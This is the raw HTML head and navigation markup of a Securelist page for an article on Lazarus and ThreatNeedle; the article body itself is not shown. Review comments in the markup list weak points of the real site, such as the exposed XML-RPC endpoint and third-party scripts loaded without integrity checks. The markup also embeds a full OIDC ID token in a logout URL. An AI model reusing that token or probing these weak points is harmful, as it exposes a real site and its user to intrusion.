<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html;charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge">
<!-- Inline Gravity Forms hook shim (minified). This and the other inline <script> blocks in this head can only execute under a script-src CSP that allows 'unsafe-inline' or carries a per-script nonce/hash. -->
<script type="text/javascript"> /* <![CDATA[ */ var gform;gform||(document.addEventListener("gform_main_scripts_loaded",function(){gform.scriptsLoaded=!0}),window.addEventListener("DOMContentLoaded",function(){gform.domLoaded=!0}),gform={domLoaded:!1,scriptsLoaded:!1,initializeOnLoaded:function(o){gform.domLoaded&&gform.scriptsLoaded?o():!gform.domLoaded&&gform.scriptsLoaded?window.addEventListener("DOMContentLoaded",o):document.addEventListener("gform_main_scripts_loaded",o)},hooks:{action:{},filter:{}},addAction:function(o,n,r,t){gform.addHook("action",o,n,r,t)},addFilter:function(o,n,r,t){gform.addHook("filter",o,n,r,t)},doAction:function(o){gform.doHook("action",o,arguments)},applyFilters:function(o){return gform.doHook("filter",o,arguments)},removeAction:function(o,n){gform.removeHook("action",o,n)},removeFilter:function(o,n,r){gform.removeHook("filter",o,n,r)},addHook:function(o,n,r,t,i){null==gform.hooks[o][n]&&(gform.hooks[o][n]=[]);var e=gform.hooks[o][n];null==i&&(i=n+"_"+e.length),gform.hooks[o][n].push({tag:i,callable:r,priority:t=null==t?10:t})},doHook:function(n,o,r){var t;if(r=Array.prototype.slice.call(r,1),null!=gform.hooks[n][o]&&((o=gform.hooks[n][o]).sort(function(o,n){return o.priority-n.priority}),o.forEach(function(o){"function"!=typeof(t=o.callable)&&(t=window[t]),"action"==n?t.apply(null,r):r[0]=t.apply(null,r)})),"filter"==n)return r[0]},removeHook:function(o,n,t,i){var r;null!=gform.hooks[o][n]&&(r=(r=gform.hooks[o][n]).filter(function(o,n,r){return!!(null!=i&&i!=o.tag||null!=t&&t!=o.priority)}),gform.hooks[o][n]=r)}}); /* ]]> */ </script> <link rel="profile" href="http://gmpg.org/xfn/11" />
<!-- The pingback link advertises the XML-RPC endpoint (xmlrpc.php). If pingbacks are not used, disabling XML-RPC removes a frequently probed entry point. -->
<link rel="pingback" href="https://securelist.com/xmlrpc.php" /> <link 
rel="apple-touch-icon" sizes="192x192" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-192x192.png"> <link rel="icon" type="image/png" sizes="192x192" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-192x192.png"> <link rel="icon" type="image/png" sizes="96x96" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-96x96.png"> <link rel="icon" type="image/png" sizes="48x48" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-48x48.png"> <link rel="icon" type="image/png" sizes="32x32" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-16x16.png"> <link rel="manifest" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/site.webmanifest"> <title>Lazarus targets defense industry with ThreatNeedle | Securelist</title> <style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style> <!-- The SEO Framework by Sybre Waaijer --> <meta name="keywords" content="APT,Lazarus,Macros,Malware Descriptions,Malware Technologies,Microsoft Office,Spear phishing" /> <link rel="canonical" href="https://securelist.com/lazarus-threatneedle/100803/" /> <meta name="description" content="In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped)." 
/> <meta property="og:type" content="article" /> <meta property="og:title" content="Lazarus targets defense industry with ThreatNeedle" /> <meta property="og:description" content="In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped)." /> <meta property="og:url" content="https://securelist.com/lazarus-threatneedle/100803/" /> <meta property="og:image" content="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/18094233/abstract_cyberspace_global_data.jpg" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:site" content="@Securelist" /> <meta name="twitter:creator" content="@Securelist" /> <meta name="twitter:title" content="Lazarus targets defense industry with ThreatNeedle" /> <meta name="twitter:description" content="In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped)." 
/> <meta name="twitter:image" content="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/18094233/abstract_cyberspace_global_data.jpg" /> <script type="application/ld+json">{"@context":"https://schema.org","@type":"NewsArticle","mainEntityOfPage":{"@type":"WebPage","@id":"https://securelist.com/lazarus-threatneedle/100803/"},"headline":"Lazarus targets defense industry with ThreatNeedle","image":"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/18094233/abstract_cyberspace_global_data.jpg","datePublished":"2021-02-25T10:00:53+00:00","dateModified":"2021-05-27T15:13:38+00:00","author":{"@type":"Person","name":"Vyacheslav Kopeytsev","url":"https://securelist.com/author/vyacheslavkopeytsev/"},"publisher":{"@type":"Organization","name":"Kaspersky","logo":{"@type":"ImageObject","url":"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/06/04065705/article-logo-small_new.png","width":60,"height":60}},"description":"In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. 
NukeSped)."}</script> <!-- / The SEO Framework by Sybre Waaijer | 82.78ms meta | 0.15ms boot --> <link rel='dns-prefetch' href='//kasperskycontenthub.com' /> <link rel='dns-prefetch' href='//securelist.com' /> <link rel='dns-prefetch' href='//www.google.com' /> <link rel="alternate" type="application/rss+xml" title="Securelist - English - Global - securelist.com » Feed" href="https://securelist.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Securelist - English - Global - securelist.com » Comments Feed" href="https://securelist.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="Securelist - English - Global - securelist.com » Lazarus targets defense industry with ThreatNeedle Comments Feed" href="https://securelist.com/lazarus-threatneedle/100803/feed/" />
<!-- Stylesheet and script bundles below are served from a separate origin over protocol-relative URLs (//assets.kasperskycontenthub.com) without an integrity attribute; that origin is therefore fully trusted for script execution on this page. -->
<link rel='stylesheet' id='crayon-group-css' href='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/crayon-syntax-highlighter/css/min/crayon.min.css,wp-includes/css/dist/block-library/style.min.css,wp-content/plugins/jquery-collapse-o-matic/css/core_style.css,wp-content/plugins/jquery-collapse-o-matic/css/light_style.css,wp-content/plugins/kspr_twitter_pullquote/css/style.css,wp-content/themes/securelist2020/assets/css/main.css,wp-content/plugins/kaspersky-social-sharing/assets/css/style.css,wp-content/plugins/kaspersky-social-sharing/assets/css/custom.css' type='text/css' media='all' /> <link rel='stylesheet' id='taxonomy-image-plugin-public-group-css' href='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/taxonomy-images/css/style.css' type='text/css' media='screen' />
<!-- jQuery 1.12.4 (legacy 1.x line) is loaded here; the window.onerror handler further down requests a downgrade when deprecated jQuery APIs fail. Check this version against current advisories. -->
<script type="text/javascript" src="https://securelist.com/wp-content/plugins/kaspersky-enable-jquery-migrate-helper/js/jquery/jquery-1.12.4-wp.js?ver=1.12.4-wp" id="jquery-core-js"></script> <script type="text/javascript" id="kasbanner-front-script-js-extra"> /* <![CDATA[ */ var kasbanner_frontend_ajax_object = 
{"restURL":"https:\/\/securelist.com\/wp-json\/","postID":"100803","postStatus":"publish"}; /* ]]> */ </script>
<!-- NOTE(review): endSessionURL below carries an OIDC ID token (id_token_hint=...) rendered into the page source. It is presumably the requesting visitor's own token, but any cache, proxy or archive of the rendered HTML (this capture included) keeps it until it expires; assembling the end-session URL at logout time instead avoids persisting it in markup. -->
<script type="text/javascript" id="kaspersky-sso-integration-js-extra"> /* <![CDATA[ */ var kasperskySSOIntegrationData = {"authorizationURL":"https:\/\/auth.ca.uis.kaspersky.com\/connect\/authorize?client_id=securelist&client_name=Securelist&redirect_uri=https%3A%2F%2Fsecurelist.com%2Fkaspersky-sso%2Flogin%2F&response_type=code&scope=openid email profile offline_access","endSessionURL":"https:\/\/auth.ca.uis.kaspersky.com\/connect\/endsession?id_token_hint=eyJhbGciOiJSUzI1NiIsImtpZCI6IkNCNzFGQTExMjc4MzgyMzQ3OTAxNzlENkJGMkVBNkFCRkZGOEQ5OUYiLCJ4NXQiOiJ5M0g2RVNlRGdqUjVBWG5Xdnk2bXFfXzQyWjgiLCJ0eXAiOiJKV1QifQ.eyJhdF9oYXNoIjoiT3VzcElmcVoyd1JkeXBDM25ZWWhEUSIsInNpZCI6Ii1xVTB3UGJMVDk5enZlYjBYOXNZY0EiLCJzdWIiOiIzMzkwM2IxZS0yZmY4LTQ3NmUtOWRkOS1kMTllMjRmYTg1MjAiLCJhdXRoX3RpbWUiOiIxNzQwMDgwODkxIiwiaWRwIjoiS2FzcGVyc2t5SWQiLCJrYXNwZXJza3kuc3ViX3ZlcnNpb24iOiIxIiwia2FzcGVyc2t5LnN1c3BpY2lvdXNfYXV0aGVudGljYXRpb24iOiJ0cnVlIiwibmJmIjoxNzQwMDgwOTAyLCJleHAiOjE3NDAxNjczMDIsImlhdCI6MTc0MDA4MDkwMiwiaXNzIjoiaHR0cHM6Ly9hdXRoLmNhLnVpcy5rYXNwZXJza3kuY29tIiwiYXVkIjoic2VjdXJlbGlzdCJ9.Ed5_QLgI5hdERW89QVT0uttD4HAKLboADRrmJ6WC7c2brqWndLlNE6XJ_5E49UF-Hse3hVh1omqHeIWV2IeSw19nljSRqePBnHsfcINwJKur-jyUFNXhYvX0ZXUnarB5xgGmUSt-p2RrrZhn-12dbc1ccb7CmHQ4wkthnI4ROElXGbVIqc1R9bmZut-x9sgE6Oc1oJqZUF2lx2fjr-eI6UBRHCKr_pUkYlDQ_yW8-tBMCaph4YtpbhWTWxYNOOngh2gjxylepNaSQJZtpGPgLpoYJXITcwutwFg4s_WOHDxfhq-isl8yTUazMqFCSe5WHZJhWi82r32bZEeg68WuYA&post_logout_redirect_uri=https:\/\/securelist.com\/kaspersky-sso\/logout\/"}; /* ]]> */ </script> <script type="text/javascript" id="kss_js-js-extra"> /* <![CDATA[ */ var kss = {"twitter_account":"Securelist"}; /* ]]> */ </script> <script type='text/javascript' 
src='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/kaspersky-lazy-load/assets/js/lazyload.js,wp-content/plugins/kaspersky-banners/assets/js/script.js,wp-content/plugins/kaspersky-sso-integration/assets/js/main.js,wp-content/plugins/kspr_twitter_pullquote/js/kaspersky-twitter-pullquote.js,wp-content/plugins/kaspersky-social-sharing/assets/js/social-share.js'></script> <link rel="alternate" hreflang="x-default" href="https://securelist.com/lazarus-threatneedle/100803/" /> <link rel="alternate" hreflang="ru" href="https://securelist.ru/lazarus-threatneedle/100591/" /> <script> window.dataLayer = window.dataLayer || []; window.dataLayer.push({ 'Author' : 'Vyacheslav Kopeytsev', 'PostId' : '100803', 'PublicationDate' : '2021-02-25', 'Categories': 'APT reports', 'Tags': 'APT, Lazarus, Macros, Malware Descriptions, Malware Technologies, Microsoft Office, Spear phishing', }); </script>
<!-- Two Google Tag Manager containers (GTM-5CGZ3HG and GTM-WZ7LJ3) are loaded here, with matching <noscript> iframes repeated in <body>. Each container can inject arbitrary tags at runtime, so both container configurations are part of this page's script trust boundary. -->
<!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-5CGZ3HG');</script> <!-- End Google Tag Manager --> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-WZ7LJ3');</script> <!-- End Google Tag Manager --> <link rel="https://api.w.org/" href="https://securelist.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://securelist.com/wp-json/wp/v2/posts/100803" /><link rel="EditURI" 
type="application/rsd+xml" title="RSD" href="https://securelist.com/xmlrpc.php?rsd" /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://securelist.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurelist.com%2Flazarus-threatneedle%2F100803%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://securelist.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurelist.com%2Flazarus-threatneedle%2F100803%2F&format=xml" /> <script type="text/javascript"> var sNew = document.createElement("script"); sNew.async = true; sNew.src = "https://kasperskycontenthub.com/?dm=ed1f9e435dc885292eab65620c51f3fb&action=load&blogid=43&siteid=1&t=767222430&back=https%3A%2F%2Fsecurelist.com%2Flazarus-threatneedle%2F100803%2F" var s0 = document.getElementsByTagName('script')[0]; s0.parentNode.insertBefore(sNew, s0); </script>
<!-- Marketo Munchkin is injected via document.write(unescape(...)) from a protocol-relative URL. document.write blocks the parser and cannot be expressed under a strict CSP; a regular <script src="https://munchkin.marketo.net/munchkin.js"> element, with Munchkin.init run once it has loaded, does the same job. -->
<script type="text/javascript"> document.write(unescape("%3Cscript src='//munchkin.marketo.net/munchkin.js' type='text/javascript'%3E%3C/script%3E")); </script> <script>Munchkin.init('802-IJN-240');</script> <meta name="google-site-verification" content="o48MojucKcP-DT5iCMR8AsvkVWP14fE78flHCqqjo50" />
<!-- WordPress jQuery Migrate Helper. On an uncaught ").X is not a function" error naming one of the listed removed jQuery APIs it POSTs action=jquery-migrate-downgrade-version to admin-ajax.php, then reloads if the server asks. The nonce is a WordPress action nonce rendered into the page (not a secret; it only scopes that request). Note the handler returns true on every path, which suppresses the browser's default reporting for ALL script errors on the page, not only jQuery ones. -->
<script type="text/javascript"> var jQueryMigrateHelperHasSentDowngrade = false; window.onerror = function( msg, url, line, col, error ) { // Break out early, do not processing if a downgrade reqeust was already sent. if ( jQueryMigrateHelperHasSentDowngrade ) { return true; } var xhr = new XMLHttpRequest(); var nonce = '999dc9864d'; var jQueryFunctions = [ 'andSelf', 'browser', 'live', 'boxModel', 'support.boxModel', 'size', 'swap', 'clean', 'sub', ]; var match_pattern = /\)\.(.+?) is not a function/; var erroredFunction = msg.match( match_pattern ); // If there was no matching functions, do not try to downgrade. 
if ( typeof erroredFunction !== 'object' || typeof erroredFunction[1] === "undefined" || -1 === jQueryFunctions.indexOf( erroredFunction[1] ) ) { return true; } // Set that we've now attempted a downgrade request. jQueryMigrateHelperHasSentDowngrade = true; xhr.open( 'POST', 'https://securelist.com/wp-admin/admin-ajax.php' ); xhr.setRequestHeader( 'Content-Type', 'application/x-www-form-urlencoded' ); xhr.onload = function () { var response, reload = false; if ( 200 === xhr.status ) { try { response = JSON.parse( xhr.response ); reload = response.data.reload; } catch ( e ) { reload = false; } } // Automatically reload the page if a deprecation caused an automatic downgrade, ensure visitors get the best possible experience. if ( reload ) { location.reload(); } }; xhr.send( encodeURI( 'action=jquery-migrate-downgrade-version&_wpnonce=' + nonce ) ); // Suppress error alerts in older browsers return true; } </script>
<!-- Markup defect: <div id="fb-root"> sits inside <head>. Per the HTML parsing algorithm a <div> here implicitly closes <head> and opens <body>, so the explicit </head> below is ignored and the <body class="..."> start tag only merges its attributes onto the already-open body. Harmless in practice, but the social loaders belong in <body>. -->
<div id="fb-root"></div>
<!-- Facebook JS SDK and (legacy) Google platform.js loaders: third-party scripts over protocol-relative URLs, no integrity attribute, same trust consideration as the asset bundles above. -->
<script> (function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/all.js#xfbml=1&appId=160639043985664"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk')); </script> <script> (function() { var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = '//apis.google.com/js/platform.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); })(); </script> <link rel="icon" href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-32x32.png" sizes="32x32" /> <link rel="icon" href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-180x180.png" /> <meta 
name="msapplication-TileImage" content="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-270x270.png" /> </head> <body class="post-template-default single single-post postid-100803 single-format-standard lang-en_US c-theme--light">
<!-- GTM <noscript> fallbacks (one per container, matching the two loaders in <head>); the iframes are hidden with inline style, which a strict style-src CSP would also have to allow. -->
<!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-5CGZ3HG" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WZ7LJ3" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) -->
<!-- Site header / product navigation chrome begins here (continues beyond this block); not part of the article. -->
<div id="site-top" class="site-top"> <div class="container"> <nav class="site-nav" data-element-id="product-menu"> <div class="label"> <p>Solutions for:</p> </div> <ul id="menu-product-menu-daily-nxgen" class="site-selector"><li><a target="_blank" href="https://www.kaspersky.com/home-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_prodmen_sm-team_______d5c53f9a5bd411f7" data-element-id="product-menu-link" class="font-icons icon-home menu-item menu-item-type-custom menu-item-object-custom menu-item-87907">Home Products</a></li> <li><a title="font-icons icon-small-business" target="_blank" href="https://www.kaspersky.com/small-business-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_prodmen_sm-team_______d5c53f9a5bd411f7" data-element-id="product-menu-link" class="font-icons icon-small-business menu-item menu-item-type-custom menu-item-object-custom menu-item-87908">Small Business 1-50 employees</a></li> <li><a target="_blank" href="https://www.kaspersky.com/small-to-medium-business-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_prodmen_sm-team_______d5c53f9a5bd411f7" data-element-id="product-menu-link" class="font-icons icon-medium-business menu-item 
data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/hybrid-cloud-security_products.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/edr-security-software-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>EDR Optimum</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/edr-security-software-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-anti-targeted-attack-platform menu-item menu-item-type-custom menu-item-object-custom menu-item-87731"><figure><a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/anti-targeted-attack-platform.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Anti Targeted Attack Platform</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-112325"><a href="https://www.kaspersky.com/enterprise-security/cloud-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" 
data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Hybrid Cloud Security</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/cloud-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-112326"><a href="https://www.kaspersky.com/enterprise-security/sd-wan?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>SD-WAN</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/sd-wan?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-private-security-network menu-item menu-item-type-custom menu-item-object-custom menu-item-87732"><figure><a href="https://www.kaspersky.com/enterprise-security/industrial-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/private-security-network.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/industrial-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Industrial CyberSecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/industrial-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-embedded-systems-security menu-item menu-item-type-custom menu-item-object-custom 
menu-item-87733"><figure><a href="https://www.kaspersky.com/enterprise-security/container-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/embedded-systems-security.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/container-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Container Security</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/container-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> </ul> <li> <ul class="regular"> <li class="title"><h6>Other Products</h6> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112328"><a href="https://www.kaspersky.com/enterprise-security/products/internet-gateway?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Security for Internet Gateway</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112329"><a href="https://www.kaspersky.com/enterprise-security/embedded-systems?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Embedded Systems Security</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112330"><a href="https://www.kaspersky.com/enterprise-security/kaspersky-iot-infrastructure-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky IoT Infrastructure Security</a> <li class="menu-item menu-item-type-custom 
menu-item-object-custom menu-item-112331"><a href="https://www.kaspersky.com/enterprise-security/kaspersky-secure-remote-workspace?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Secure Remote Workspace</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112332"><a href="https://www.kaspersky.com/enterprise-security/mail-server-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Security for Mail Server</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87740"><a target="_blank" href="https://www.kaspersky.com/enterprise-security/products?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">View All</a> </ul> </ul> <li class="dropdown mega menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87741"><a href="https://www.kaspersky.com/enterprise-security/services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Services</a> <ul class="submenu"> <li class="first featured featured-smaller menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87742"> <ul class="featured section-col-l-3 no-gutter"> <li class="show-figure smaller-item icon-cybersecurity-services menu-item menu-item-type-custom menu-item-object-custom menu-item-87743"><figure><a href="https://www.kaspersky.com/enterprise-security/cybersecurity-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/cybersecurity-services.png"</a></figure><a 
href="https://www.kaspersky.com/enterprise-security/cybersecurity-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Cybersecurity Services</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/cybersecurity-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-105619"><a href="https://www.kaspersky.com/enterprise-security/security-awareness?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Security Awareness</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/security-awareness?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-premium-support menu-item menu-item-type-custom menu-item-object-custom menu-item-87745"><figure><a href="https://www.kaspersky.com/enterprise-security/premium-support?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/premium-support.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/premium-support?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Premium Support</a><div class="desc"><p><a 
href="https://www.kaspersky.com/enterprise-security/premium-support?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-threat-intelligence menu-item menu-item-type-custom menu-item-object-custom menu-item-87746"><figure><a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/threat-intelligence.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Threat Intelligence</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-incident-response menu-item menu-item-type-custom menu-item-object-custom menu-item-87748"><figure><a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/incident-response.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span 